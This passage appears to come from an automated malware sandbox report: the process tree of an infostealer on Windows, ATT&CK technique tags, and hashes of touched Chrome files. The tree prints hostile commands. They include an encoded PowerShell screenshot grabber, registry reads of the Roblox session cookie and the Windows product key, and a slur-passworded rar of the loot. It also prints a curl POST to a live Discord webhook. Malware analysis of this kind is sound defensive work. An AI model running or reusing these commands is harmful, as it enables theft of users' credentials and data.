kAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA="
        7⤵
        
        PID:5620
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand JABzAG8AdQByAGMAZQAgAD0AIABAACIADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtADsADQAKAHUAcwBpAG4AZwAgAFMAeQBzAHQAZQBtAC4AQwBvAGwAbABlAGMAdABpAG8AbgBzAC4ARwBlAG4AZQByAGkAYwA7AA0ACgB1AHMAaQBuAGcAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcAOwANAAoAdQBzAGkAbgBnACAAUwB5AHMAdABlAG0ALgBXAGkAbgBkAG8AdwBzAC4ARgBvAHIAbQBzADsADQAKAA0ACgBwAHUAYgBsAGkAYwAgAGMAbABhAHMAcwAgAFMAYwByAGUAZQBuAHMAaABvAHQADQAKAHsADQAKACAAIAAgACAAcAB1AGIAbABpAGMAIABzAHQAYQB0AGkAYwAgAEwAaQBzAHQAPABCAGkAdABtAGEAcAA+ACAAQwBhAHAAdAB1AHIAZQBTAGMAcgBlAGUAbgBzACgAKQANAAoAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAdgBhAHIAIAByAGUAcwB1AGwAdABzACAAPQAgAG4AZQB3ACAATABpAHMAdAA8AEIAaQB0AG0AYQBwAD4AKAApADsADQAKACAAIAAgACAAIAAgACAAIAB2AGEAcgAgAGEAbABsAFMAYwByAGUAZQBuAHMAIAA9ACAAUwBjAHIAZQBlAG4ALgBBAGwAbABTAGMAcgBlAGUAbgBzADsADQAKAA0ACgAgACAAIAAgACAAIAAgACAAZgBvAHIAZQBhAGMAaAAgACgAUwBjAHIAZQBlAG4AIABzAGMAcgBlAGUAbgAgAGkAbgAgAGEAbABsAFMAYwByAGUAZQBuAHMAKQANAAoAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHQAcgB5AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAFIAZQBjAHQAYQBuAGcAbABlACAAYgBvAHUAbgBkAHMAIAA9ACAAcwBjAHIAZQBlAG4ALgBCAG8AdQBuAGQAcwA7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHUAcwBpAG4AZwAgACgAQgBpAHQAbQBhAHAAIABiAGkAdABtAGEAcAAgAD0AIABuAGUAdwAgAEIAaQB0AG0AYQBwACgAYgBvAHUAbgBkAHMALgBXAGkAZAB0AGgALAAgAGIAbwB1AG4AZABzAC4ASABlAGkAZwBoAHQAKQApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAB1AHMAaQBuAGcAIAAoAEcAcgBhAHAAaABpAGMAcwAgAGcAcgBhAHAAaABpAGMAcwAgAD0AIABHAHIAYQBwAGgAaQBjAHMALgBGAHIAbwBtAEkAbQBhAGcAZQAoAGIAaQB0AG0AYQBwACkAKQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAHsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAGcAcgBhAHAAaABpAGMAcwAuAEMAbwBwAHkARgByAG8AbQBTAGMAcgBlAGUAbgAoAG4AZQB3ACAAUABvAGkAbgB0ACgAYgBvAHUAbgBkAHMALgBMAGUAZgB0ACwAIABiAG8AdQBuAGQAcwAuAFQAbwBwACkALAAgAFAAbwBpAG4AdAAuAEUAbQBwAHQAeQAsACAAYgBvAHUAbgBkAHMALgBTAGkAegBlACkAOwANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAcgBlAHMAdQBsAHQAcwAuAEEAZABkACgAKABCAGkAdABtAGEAcAApAGIAaQB0AG0AYQBwAC4AQwBsAG8AbgBlACgAKQApADsADQAKACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAYwBhAHQAYwBoACAAKABFAHgAYwBlAHAAdABpAG8AbgApAA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAB7AA0ACgAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgACAAIAAgAC8ALwAgAEgAYQBuAGQAbABlACAAYQBuAHkAIABlAHgAYwBlAHAAdABpAG8AbgBzACAAaABlAHIAZQANAAoAIAAgACAAIAAgACAAIAAgACAAIAAgACAAfQANAAoAIAAgACAAIAAgACAAIAAgAH0ADQAKAA0ACgAgACAAIAAgACAAIAAgACAAcgBlAHQAdQByAG4AIAByAGUAcwB1AGwAdABzADsADQAKACAAIAAgACAAfQANAAoAfQANAAoAIgBAAA0ACgANAAoAQQBkAGQALQBUAHkAcABlACAALQBUAHkAcABlAEQAZQBmAGkAbgBpAHQAaQBvAG4AIAAkAHMAbwB1AHIAYwBlACAALQBSAGUAZgBlAHIAZQBuAGMAZQBkAEEAcwBzAGUAbQBiAGwAaQBlAHMAIABTAHkAcwB0AGUAbQAuAEQAcgBhAHcAaQBuAGcALAAgAFMAeQBzAHQAZQBtAC4AVwBpAG4AZABvAHcAcwAuAEYAbwByAG0AcwANAAoADQAKACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzACAAPQAgAFsAUwBjAHIAZQBlAG4AcwBoAG8AdABdADoAOgBDAGEAcAB0AHUAcgBlAFMAYwByAGUAZQBuAHMAKAApAA0ACgANAAoADQAKAGYAbwByACAAKAAkAGkAIAA9ACAAMAA7ACAAJABpACAALQBsAHQAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQAcwAuAEMAbwB1AG4AdAA7ACAAJABpACsAKwApAHsADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0ACAAPQAgACQAcwBjAHIAZQBlAG4AcwBoAG8AdABzAFsAJABpAF0ADQAKACAAIAAgACAAJABzAGMAcgBlAGUAbgBzAGgAbwB0AC4AUwBhAHYAZQAoACIALgAvAEQAaQBzAHAAbABhAHkAIAAoACQAKAAkAGkAKwAxACkAKQAuAHAAbgBnACIAKQANAAoAIAAgACAAIAAkAHMAYwByAGUAZQBuAHMAaABvAHQALgBEAGkAcwBwAG8AcwBlACgAKQANAAoAfQA=
        8⤵
        
        PID:5948
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
        
        "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\obyzpafw\obyzpafw.cmdline"
        9⤵
        
        PID:3580
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
        
        C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES3DB1.tmp" "c:\Users\Admin\AppData\Local\Temp\obyzpafw\CSC2F98C8D9904942069BA93AFDD0EB79A0.TMP"
        10⤵
        
        PID:2904
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3128
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:3160
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib -r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:1580
        
        C:\Windows\system32\attrib.exe
        
        attrib -r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:5640
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "attrib +r C:\Windows\System32\drivers\etc\hosts"
        7⤵
        
        PID:5872
        
        C:\Windows\system32\attrib.exe
        
        attrib +r C:\Windows\System32\drivers\etc\hosts
        8⤵
        Drops file in Drivers directory
        Views/modifies file attributes
        
        PID:4844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3408
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:4744
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:5100
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:4188
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tasklist /FO LIST"
        7⤵
        
        PID:4548
        
        C:\Windows\system32\tasklist.exe
        
        tasklist /FO LIST
        8⤵
        Enumerates processes with tasklist
        
        PID:2768
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:3628
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:5344
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "tree /A /F"
        7⤵
        
        PID:1636
        
        C:\Windows\system32\tree.com
        
        tree /A /F
        8⤵
        
        PID:4780
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1892"
        7⤵
        
        PID:876
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1892
        8⤵
        Kills process with taskkill
        
        PID:5316
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1892"
        7⤵
        
        PID:2460
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1892
        8⤵
        Kills process with taskkill
        
        PID:3816
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3660"
        7⤵
        
        PID:4088
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3660
        8⤵
        Kills process with taskkill
        
        PID:5088
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 3660"
        7⤵
        
        PID:3568
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 3660
        8⤵
        Kills process with taskkill
        
        PID:5860
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4176"
        7⤵
        
        PID:4716
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4176
        8⤵
        Kills process with taskkill
        
        PID:5844
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 4176"
        7⤵
        
        PID:3420
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 4176
        8⤵
        Kills process with taskkill
        
        PID:2896
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2944"
        7⤵
        
        PID:5252
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2944
        8⤵
        Kills process with taskkill
        
        PID:4560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2944"
        7⤵
        
        PID:5912
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2944
        8⤵
        Kills process with taskkill
        
        PID:368
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1884"
        7⤵
        
        PID:4376
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1884
        8⤵
        Kills process with taskkill
        
        PID:5928
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1884"
        7⤵
        
        PID:5940
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1884
        8⤵
        Kills process with taskkill
        
        PID:2044
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1920"
        7⤵
        
        PID:4344
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1920
        8⤵
        Kills process with taskkill
        
        PID:4328
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 1920"
        7⤵
        
        PID:6084
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 1920
        8⤵
        Kills process with taskkill
        
        PID:4568
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2736"
        7⤵
        
        PID:1708
        
        C:\Windows\System32\Conhost.exe
        
        \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        8⤵
        
        PID:1636
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2736
        8⤵
        Kills process with taskkill
        
        PID:3576
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "taskkill /F /PID 2736"
        7⤵
        
        PID:2360
        
        C:\Windows\system32\taskkill.exe
        
        taskkill /F /PID 2736
        8⤵
        Kills process with taskkill
        
        PID:5664
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:4980
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:64
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY"
        7⤵
        
        PID:2592
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path HKLM:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
        8⤵
        
        PID:1456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "getmac"
        7⤵
        
        PID:5680
        
        C:\Windows\system32\getmac.exe
        
        getmac
        8⤵
        
        PID:2868
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe a -r -hp"nigga" "C:\Users\Admin\AppData\Local\Temp\Oo8iI.zip" *"
        7⤵
        
        PID:6108
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe
        
        C:\Users\Admin\AppData\Local\Temp\_MEI40202\rar.exe a -r -hp"nigga" "C:\Users\Admin\AppData\Local\Temp\Oo8iI.zip" *
        8⤵
        Executes dropped EXE
        
        PID:2976
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic os get Caption"
        7⤵
        
        PID:5488
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic os get Caption
        8⤵
        
        PID:1164
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic computersystem get totalphysicalmemory"
        7⤵
        
        PID:4684
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic computersystem get totalphysicalmemory
        8⤵
        
        PID:4500
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic csproduct get uuid"
        7⤵
        
        PID:1716
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic csproduct get uuid
        8⤵
        
        PID:5180
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER"
        7⤵
        
        PID:5920
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
        8⤵
        Command and Scripting Interpreter: PowerShell
        
        PID:4560
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "wmic path win32_VideoController get name"
        7⤵
        
        PID:1440
        
        C:\Windows\System32\Wbem\WMIC.exe
        
        wmic path win32_VideoController get name
        8⤵
        Detects videocard installed
        
        PID:5456
        
        C:\Windows\system32\cmd.exe
        
        C:\Windows\system32\cmd.exe /c "powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault"
        7⤵
        
        PID:5396
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
        powershell Get-ItemPropertyValue -Path 'HKLM:SOFTWARE\Microsoft\Windows NT\CurrentVersion\SoftwareProtectionPlatform' -Name BackupProductKeyDefault
        8⤵
        
        PID:6124
  - - C:\Users\Admin\AppData\Local\Temp\uctviy.exe
      "C:\Users\Admin\AppData\Local\Temp\uctviy.exe"
      4⤵
      Executes dropped EXE
      PID:2224
- - C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Roaming\PIN CRACKER V2.bat" "
    3⤵
    PID:444
  - - C:\Windows\system32\chcp.com
      chcp 65001
      4⤵
      PID:4688
  - - C:\Windows\system32\where.exe
      where curl
      4⤵
      PID:3012
  - - C:\Windows\system32\curl.exe
      curl -H "Content-Type: application/json" -X POST -d "{\"content\":\"@everyone @here Your Roblox Cookie is ready: 3\"}" "https://discordapp.com/api/webhooks/1294585526804025436/ok3FvyE5NZ7ZDo4imAca_NqcAQYVuI-C6l2HJn4ILFCEdP9y9WgkKrCuwarM8seLpUDn"
      4⤵
      PID:5920
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=728,i,7589719603711531136,18179242857575152687,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5384 /prefetch:8
  2⤵
  PID:5512

C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\123.0.6312.123\elevation_service.exe"
1⤵
PID:2352

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s NgcSvc
1⤵
PID:3620

C:\Users\Admin\system user
"C:\Users\Admin\system user"
1⤵
- Executes dropped EXE
PID:5204

C:\Users\Admin\system user
"C:\Users\Admin\system user"
1⤵
- Executes dropped EXE
PID:6112

C:\Users\Admin\system user
"C:\Users\Admin\system user"
1⤵
- Executes dropped EXE
PID:3948

C:\Windows\system32\wbem\wmiprvse.exe
C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
1⤵
PID:3160

C:\Users\Admin\system user
"C:\Users\Admin\system user"
1⤵
- Executes dropped EXE
PID:5004

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Persistence

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Privilege Escalation

Boot or Logon Autostart Execution

T1547

Registry Run Keys / Startup Folder

T1547.001

Event Triggered Execution

T1546

Netsh Helper DLL

T1546.007

Scheduled Task/Job

T1053

Scheduled Task

T1053.005

Defense Evasion

Hide Artifacts

T1564

Hidden Files and Directories

T1564.001

Modify Registry

T1112

Obfuscated Files or Information

T1027

Command Obfuscation

T1027.010

Credential Access

Credentials from Password Stores

T1555

Credentials from Web Browsers

T1555.003

Unsecured Credentials

T1552

Credentials In Files

T1552.001

Discovery

Browser Information Discovery

T1217

Network Share Discovery

T1135

Process Discovery

T1057

Query Registry

T1012

System Information Discovery

T1082

System Network Configuration Discovery

T1016

Wi-Fi Discovery

T1016.002

Lateral Movement

Collection

Clipboard Data

T1115

Data from Local System

T1005

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\BrowsingTopicsState

Filesize
649B

MD5
5d2724a6e8bf5ee4b609264b07766e27

SHA1
abd659553e8db71a0dc006f181b0ed4c7df7b7e4

SHA256
bc1499c7a88088b7e5cba4c9ff5da44e52322d3a7f5618ff773e4a8276cb226d

SHA512
b0032665281f72a1b7febd4dc7546673d2c7c644ff76dd8194679a65445bc030d8dc964c874333193ca1edfe49b77b8b607684835bb4974b5ef61813560d0102

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\History

Filesize
160KB

MD5
d993523100ae7886ef8561656341fb18

SHA1
51e7abeb1b39176e4df66a8252d4878762c1f6ab

SHA256
7cd097f190ee4faff482dd611e0539980ac7f2dfba77baeb8829a61e71e90237

SHA512
d1f25f74d8a92c1d842a131193eab55e42075c2f9b89c228274b4273968e1f3edba68ad63365e2c2ba7f6caeac8a8088bab1fca4d6b11f02a5c89164a3f9ac81

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\Network Persistent State

Filesize
1KB

MD5
73e5b5cfb79d916e9664ea2b58d0b9c3

SHA1
8cad78cd1c228c38a92dd75f2222b7405939a8bc

SHA256
47249d409f3543e684364ab705002cac0f520c275e7ddfdbe1079b5cb9529d65

SHA512
fd4bf0ff545866fe0bd152dd1f34d9cbd28a36c117d1a68a17ad978f8843f7ebf281db8d7afb6654eded662abf83649e1e62aa1bb07268df05ef4116a68635d9

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Network\SCT Auditing Pending Reports

Filesize
2B

MD5
d751713988987e9331980363e24189ce

SHA1
97d170e1550eee4afc0af065b78cda302a97674c

SHA256
4f53cda18c2baa0c0354bb5f9a3ecbe5ed12ab4d8e11ba873c2f11161202b945

SHA512
b25b294cb4deb69ea00a4c3cf3113904801b6015e5956bd019a8570b1fe1d6040e944ef3cdee16d0a46503ca6e659a25f21cf9ceddc13f352a3c98138c15d6af

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
dee1302662e28db8d0a87c45c4307171

SHA1
feaec3b7cf43c36f1956e13b2e8dfdd7591dc00a

SHA256
06cd225cea997dd5b6c86141576dcfb3d441b7518807172861a6e07bd5661aa2

SHA512
43dcae7518a4768973dedadbae3a0d66150baf79f056a2b235dd22cb8eb2d16934312cd9ff158262c1f1855e1e653f13dc653c79442a9fd44d250519651e936a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
aba69a78da27abd3e5b03a3c19c7748c

SHA1
edc64d2d90ca80c70e3c979b37142880c2f84a40

SHA256
f2fdf1c92da1d8d28469b78aca777928fcd13bcff4342d3f8f98821379e73437

SHA512
652978293394c06f441821112d754993dcbe1bd91dcd84e991c9a9865ccc6e94d92856cd6ee757e8f3b1660a2a6c4020d814176e427e053761dcfeecd15a1c5d

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
3d0bfc059034a362b0ca1d577fa47cc9

SHA1
db1bd676cea1c26453bfb09a82929287ba7b2084

SHA256
26bcb7574eb13daf03d7c72ce3c2e8378b3d8745caa0df8dad65ad87117051bb

SHA512
f97ee7802513ee8b23c42ea7565932fb51c456439096ae46091a2651015bcab68ca4e709dbe265e60c4f1f63f2e07cd3ab90a7c49d7a0dcf71876e27f172b011

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
52134fd1923c18dea2e608106659a2d2

SHA1
71c8d0ad4e6f08fc9b1f6f949e20aeb372b11c21

SHA256
fd5677e195ebbf1a0da9fa4083891cb4e575703793c61d1c21c533f1056b9cf8

SHA512
bd4d32dbc852bc02aa12dd9246a37d5ccc966b1582df1ec49a4e46f9ff63eeb4e13bd6bb6cb600477c47f5c920a9c9be7362d1b58f88c9b8206952549080a34a

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
5cc085e2cfb680c6ebe82b245021ec6f

SHA1
a5b2cf8b5f96e2f31f237ce9302274e1bdf67cee

SHA256
290517371425b5b4035815912495c5ae29880786d36e9ca597f1ea5856b56389

SHA512
7508686ecd774ced5665bf265109b3c9d61e7f05995c79f8857edadd212c6c419739bf0111a3fec473db526252aab1c47370001f18a4015ba211748651df91bf

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
d36a7afdee51ff78054708af45b66c36

SHA1
77a0ecb453585da219fb9cd139459c308fa25bb9

SHA256
33e7de1bbdb6b97221d88f56ef1e20026a2871646cf04fa67d921f0451735cfe

SHA512
7cf1076b2121c69d3227708700177530b1e5d38686dd754293b9ed9f64da847718467c8de18ce6259db62d8d589a17d1f1975d683e9616abd000638cd3968363

Download Submit
C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

Filesize
9KB

MD5
44bc6d89d0a3a5725e6d8c7494d2656b

SHA1
2bfc7ad7d9ce16507cbec196bdff4ea9c5a6d442

SHA256
